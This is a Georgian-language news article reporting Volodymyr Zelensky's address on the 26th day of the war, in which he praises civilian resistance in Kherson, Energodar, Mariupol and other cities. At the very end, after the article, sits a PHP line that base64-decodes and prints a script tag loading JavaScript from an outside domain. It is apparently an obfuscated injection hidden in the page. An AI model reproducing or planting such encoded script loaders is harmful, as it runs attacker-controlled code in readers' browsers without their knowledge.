celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტმა, ვოლოდიმერ ზელნსკიმ მორიგი ვიდეომიმართვისას, ომის დაწყებიდან 26 დღეს, უკრაინელები კიდევ ერთხელ გაამხნევა და შეახსენა, რომ სახელმწიფო ყველა მათგანის განსაცდელს იზიარებს, მათ გვერდითაა და მადლიერია იმ შეუპოვარი ბრძოლისთვის რასაც ისინი თავიანთ ქალაქებში შიშველი ხელებით ცდილობენ.
 
"ამ ვიდეოში მინდა უკრაინულ ქალაქებსა და მათ ერთგულ მცველებს მივმართო თავისუფალი უკრაინის სახელით, სადაც მზე მხოლოდ სასურველი სტუმრებისთვის ანათებს და არა გამვლელი, ტანკზე შემსხდარი ტურისტებისთვის. 
 
ბერდიანსკიდან ხერსონის ჩათვლით, სადაც თავისუფალ ადამიანებს მონებმა ცეცხლი გაუხსნეს. მონებისთვის, რომლებისთვისაც პროპაგანდა სიწმინდეა. მონები მოხუც ქალს დაუპირისპირდნენ, რომელსაც ხელში თეთრი დროშა ეჭირა, ასევე ახალგაზრდა გოგოს, თეთრი პლაკატით ხელში. რუსების მიერ გამოგზავნილ მონებს ამდენი თავისუფალი ადამიანი არასდროს უნახავთ. ქუჩებში, მოედნებზე არასოდეს უნახავთ ათასობით ადამიანი, რომლებსაც შეიარაღებული მონების არ ეშინიათ. მონებისთვის თავისუფლება უცხოა. 
 
ხერსონო, მედგრად იდექი, არასდროს დავივიწყებთ კადრებს, რომელიც დღეს ვნახეთ. დღეს 40 მილიონი უკრაინელი თქვენთან ერთად იდგა. მილიონობით უკრაინელმა მსოფლიოს მასშტაბით, დაინახა, როგორი თავისუფლები ხართ, როგორ იბრძოდით და როგორ გინდათ დროებით წართმეული თავისუფლების დაბრუნება. ამ ავადმყოფებს იქ მშვიდი დღეები არ ელოდებათ. თითოეულ ოკუპანტს, ვინც მშვიდობიან მოქალაქეებს ყვითელი და ლურჯი ფერების გამო ცეცხლი გაუხსნა, შავი ლენტი გადაეფარება. ჩვენ კი გამარჯვებას ისევე ვიზეიმებთ, როგორც ენერგოდარის მცხოვრებლები, რომლებმაც დღეს მტერი შიშველი ხელებით განდევნეს.
 
შავი ლენტი გადაეფარება მტერს ბერდიანსკშიც. მელიტოპოლშიც, კახოვკაშიც და ყველა ქალაქში, სადაც ჩვენს მოქალაქეებს იტაცებენ. იმ ადამიანებს, რომლებიც მტრის აზრით, მათთან დაპირისპირებისთვის წინააღმდეგობას ამზადებენ. თუმცა უკრაინელებს წინააღმდეგობის მომზადება არ სჭირდებათ - ეს რუსეთი არაა, აქ წინააღმდეგობა სულშია გაჯერებული. 
 
უკრაინის არცერთ ნაწილში არ მინდა, ადამიანებმა იფიქრონ, რომ მათი ქვეყანა მათზე არ ფიქრობს, ან არ ახსოვს. ყველა ჯერზე, როდესაც გტკივათ, გიმძიმთ, როცა ყველაფრის წინააღმდეგ მიდიხართ, გევედრებით, იცოდეთ, რომ ამ დროს ჩვენ თქვენზე ვფიქრობთ და გული გვისკდება, რადგან ადგილზე ვერ ვართ. გთხოვთ, გაუძელით იქამდე, სანამ უცხოტომელებს არ გავყრით. თქვენი წინააღმდეგობა წარმატების სიმბოლოა. ბედნიერებაა, რომ თქვენნაირი ადამიანები გვყავს. ჩვენ ყველა უკრაინელები ვართ. 
 
შემოჭრის დღიდან ახალთახალი გმირები იბადებიან. ეს ეხება ქალებს და კაცებს, რომლებიც ჩვენი ქვეყნის დასაცავად დგებიან. ყველას, უკრაინის აღმოსავლეთით, დასავლეთით, სამხრეთით, ჩრდილოეთით, ასევე ქვეყნის ცენტრალურ ნაწილსა და საზღვარგარეთ მცხოვრებ უკრაინელებს. 
 
მტერს არ სჯერა, რომ ეს რეალობაა. მენდეთ, რომ ამ ყველაფერს დავაჯერებთ. ვაჩვენებთ და დავამახსოვრებინებთ, რომ მათი გზა ჩვენამდე არ მოდის. უკრაინულ ქალაქებში ფეხს ვერასდროს მოიკიდებთ. ვერც კიევში, ვერც ხარკოვში, ვერც ბერდიანსკსა და მარიუპოლში. იმ მარიუპოლში, რომელსაც ასე ანადგურებთ, მაგრამ მაინც მედგრად დგას. 
 
ჩვენ თითოეული უკრაინელისთვის ვიბრძვით და თითოეული მათგანის შესახებ გვახსოვს. 
 
დიდებული უკრაინის დიდებულო ერო - ამ სიტყვებს უბრალოდ არ ვამბობ, ეს ეხება ყველას, ვინც ქალაქშია, ვინც სოფელში ცხოვრობს, ვინც საზღვრებს გარეთაა. ვინც თავისუფალია და დროებით ოკუპირებულ ტერიტორიებზე, ყირიმში, დონბასსა და ლუგანსკშია. ჩვენი უკრაინა ყველამ უნდა დავიცვათ და არაფრის დალოდება არ შეიძლება. 
 
მოგმართავთ ყველა უკრაინელს, სადაც არ უნდა იყოთ, ყველაფერი გააკეთეთ სამშობლოსა და ჩვენი ერის დასაცავად. იბრძოლეთ და დაეხმარეთ! განდევნეთ ოკუპანტები და მძარცველები, რომ უკრაინა გადარჩეს და თავისუფლად და ბედნიერად ვიცხოვროთ იმ ქვეყანაში, რომელიც ასე ძალიან გვიყვარს."– განაცხადა ზელენსკიმ.
 
 
 
765
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");